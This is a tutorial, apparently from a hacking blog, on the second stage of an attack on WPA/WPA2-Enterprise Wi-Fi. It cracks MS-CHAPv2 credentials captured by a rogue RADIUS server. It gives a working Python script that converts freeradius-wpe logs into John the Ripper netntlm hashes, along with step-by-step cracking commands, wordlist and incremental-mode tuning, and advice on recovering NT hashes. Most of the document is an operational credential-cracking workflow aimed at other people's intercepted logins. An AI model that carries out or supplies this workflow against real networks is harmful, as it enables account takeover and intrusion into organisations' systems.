
How to Hack WPA/WPA2-Enterprise Part 2

Oct 15, 2015 06:13 PM

In the second part of this tutorial we are going to crack the credentials captured in part one: the MS-CHAPv2 challenge/response pairs that the rogue RADIUS server logged in its freeradius-creds file. I'm going to explain how to do it with the powerful John the Ripper. It comes with Kali by default, so there is nothing to install.

Using John the Ripper

If you don't know anything about this tool, you can check its Wikipedia article.

First, we have to convert the captured credentials into a format John understands. We will use a simple script that reads our freeradius-credsXXXXX.txt file and writes one John-format line per captured challenge/response pair. You can download it here.

Visit the previous link, copy the script text to your clipboard and open a terminal.

Type:

nano radiustojohn.py

Paste the text from your clipboard, hit Control + O to save the file, then Control + X to exit. Make the script executable by typing:

chmod +x radiustojohn.py

Now run the script with the freeradius-credsXXXXXXX.txt file as its argument:

./radiustojohn.py <path to the freeradius-creds file>

Now we've generated a freeradius.john file that John can understand. Type:

john --format=netntlm freeradius.john
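The conversion script linked above is not reproduced on this page, so here is an added example of the same job, written for this article and not the author's script. It assumes the freeradius-wpe log layout shown in SAMPLE_LOG (a "mschap:" line followed by indented username, challenge and response lines, values as colon-separated hex) and that the logged 8-byte challenge is already the derived MS-CHAPv2 challenge that John's netntlm format expects. Entries that are truncated or malformed are skipped instead of being written into the John file, and the sample log is constructed, not a real capture.

```python
#!/usr/bin/env python3
"""Convert freeradius-wpe MS-CHAPv2 log entries into John the Ripper's netntlm format.

Added example for this article, not the script linked from it. Assumes the
freeradius-wpe log layout shown in SAMPLE_LOG and that the logged 8-byte
challenge is the derived MS-CHAPv2 challenge used by NetNTLM cracking tools.
"""
import re
import sys

# Constructed sample in the freeradius-wpe log layout (not a real capture).
# The second entry is deliberately incomplete (no response line) to exercise
# the parser's handling of truncated records; the third uses uppercase hex
# and a DOMAIN\user style username.
SAMPLE_LOG = (
    "mschap: Thu Oct 15 18:13:02 2015\n"
    "\tusername: alice\n"
    "\tchallenge: 0e:11:ac:5c:d2:94:bb:7f\n"
    "\tresponse: 5b:e9:36:7c:02:a1:4d:88:19:f3:c0:6e:77:2b:ad:50:91:e4:3a:0c:d6:85:1f:b2\n"
    "mschap: Thu Oct 15 18:13:09 2015\n"
    "\tusername: bob\n"
    "\tchallenge: 11:22:33:44:55:66:77:88\n"
    "mschap: Thu Oct 15 18:13:21 2015\n"
    "\tusername: CORP\\carol\n"
    "\tchallenge: A1:B2:C3:D4:E5:F6:07:18\n"
    "\tresponse: 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:01:23:45:67:89:ab:cd:ef\n"
)

FIELD_RE = re.compile(r"^\s*(username|challenge|response):\s*(.*?)\s*$")


def colon_hex_to_hex(value, expected_len):
    """Turn 'aa:bb:cc' into 'aabbcc'; return None unless it is exactly expected_len bytes."""
    parts = value.split(":")
    if len(parts) != expected_len or not all(re.fullmatch(r"[0-9A-Fa-f]{2}", p) for p in parts):
        return None
    return "".join(parts).lower()


def parse_wpe_log(text):
    """Return (username, challenge_hex, response_hex) for every complete, well-formed entry."""
    records = []
    current = None
    for line in text.splitlines():
        if line.startswith("mschap:"):      # a new entry starts here
            if current is not None:
                records.append(current)
            current = {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    if current is not None:
        records.append(current)

    result = []
    for rec in records:
        user = rec.get("username")
        chal = colon_hex_to_hex(rec.get("challenge", ""), 8)   # derived challenge: 8 bytes
        resp = colon_hex_to_hex(rec.get("response", ""), 24)   # NT response: 24 bytes
        if not user or chal is None or resp is None:
            continue    # truncated or malformed entry: do not feed John garbage
        result.append((user, chal, resp))
    return result


def to_john_line(user, chal, resp):
    """John's netntlm input line: user:$NETNTLM$<16 hex challenge>$<48 hex response>."""
    return f"{user}:$NETNTLM${chal}${resp}"


def convert(text):
    """Full conversion of a log file's text into a list of John input lines."""
    return [to_john_line(*r) for r in parse_wpe_log(text)]


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} <freeradius-creds file>", file=sys.stderr)
        return 1
    with open(argv[1], encoding="utf-8", errors="replace") as f:
        lines = convert(f.read())
    with open("freeradius.john", "w", encoding="utf-8") as out:
        out.write("\n".join(lines) + ("\n" if lines else ""))
    print(f"wrote {len(lines)} hashes to freeradius.john", file=sys.stderr)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as ./radiustojohn.py freeradius-credsXXXXX.txt and it writes freeradius.john in the same form the article's script produces, ready for john --format=netntlm. The strict length checks matter: a response that is not exactly 24 bytes, or a challenge that is not 8, will not load as netntlm anyway, so dropping those entries up front keeps John's "no password hashes loaded" errors from hiding the good ones.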


At any time you can hit any key to see the current status. In our run, John guessed 12 passwords in about 3 seconds using its default modes. The weaker the password, the faster it falls; strong passwords can take years with John's default wordlist, so a custom wordlist tailored to the target helps a lot. Keep in mind, too, that an MS-CHAPv2 response is built from the user's NT hash with three DES operations, so the NT hash itself can be recovered by exhaustive DES key search independent of how strong the password is; a long password slows this tutorial's attack, but it does not make EAP-MSCHAPv2 safe. To use your own dictionary:

john --format=netntlm --wordlist=<path to your dictionary file> freeradius.john

If you know something about the password, for example its length, you can edit John's configuration file so that incremental mode only tries candidates of that length. On Kali the file is /etc/john/john.conf. Let's make a backup of it first:

cd /etc/john/

cp john.conf john.conf.old

Now that we've made a backup of the original file, let's change it.

leafpad john.conf

[Screenshot: the [Incremental:All] section of john.conf, with its MinLen and MaxLen settings]

Find the [Incremental:All] section of the file and change MinLen and MaxLen to the password length. If you know the password is exactly 8 characters long, set MinLen = 8 and MaxLen = 8 (MaxLen is bounded by the charset file that mode uses, so you cannot push it above what the .chr file supports). Save the changes and run John in incremental mode:

john --format=netntlm --incremental=All freeradius.john

Jumbo builds of John also support OpenCL, so the hash formats with a GPU implementation can be cracked on your graphics card, which is much faster than the CPU.

That's all, I hope you've enjoyed! Ask any question!
